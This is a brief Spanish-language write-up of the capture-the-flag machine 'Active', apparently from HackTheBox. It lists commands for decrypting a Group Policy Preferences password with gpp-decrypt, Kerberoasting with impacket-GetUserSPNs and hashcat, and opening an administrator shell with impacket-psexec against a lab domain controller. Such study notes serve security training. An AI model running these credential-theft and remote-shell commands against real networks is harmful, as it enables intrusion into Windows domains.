# Active

### Resumen de la resolución

* Máquina Windows DC con servicio SMB expuesto
* Explotación SMB con pivoting de usuarios
* Abuso de GPP (Group Policy Preference) para conseguir credenciales encriptadas con Microsoft AES
* Ataque Kerberoasting

### Habilidades adquiridas

* Explotación de GPP, característica que se puede encontrar en sistemas Windows Server 2008 y previos, para conseguir credenciales encriptadas almacenadas en el archivo Groups.xml y desencriptarlas posteriormente con gpp-decrypt.

{% code overflow="wrap" %}

```bash
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
```

{% endcode %}

### Comandos y herramientas destacables

* Kerberoasting

{% code overflow="wrap" %}

```bash
impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.129.228.53 -request -o krb5tgs.txt
hashcat -m 13100 krb5tgs_hashes /usr/share/wordlists/rockyou.txt
```

{% endcode %}

* Obtención de shell abusando de permisos de escritura en recursos compartidos por SMB

```bash
impacket-psexec active.htb/administrator@10.129.228.53
```

{% hint style="info" %}
impacket-psexec carga un ejecutable con un nombre aleatorio en uno de los recursos compartidos de Windows y registra un servicio a través de RPC que nos otorga una shell interactiva
{% endhint %}

### Walkthrough en YouTube:

{% embed url="<https://youtu.be/I6uN1rNhu8g>" %}
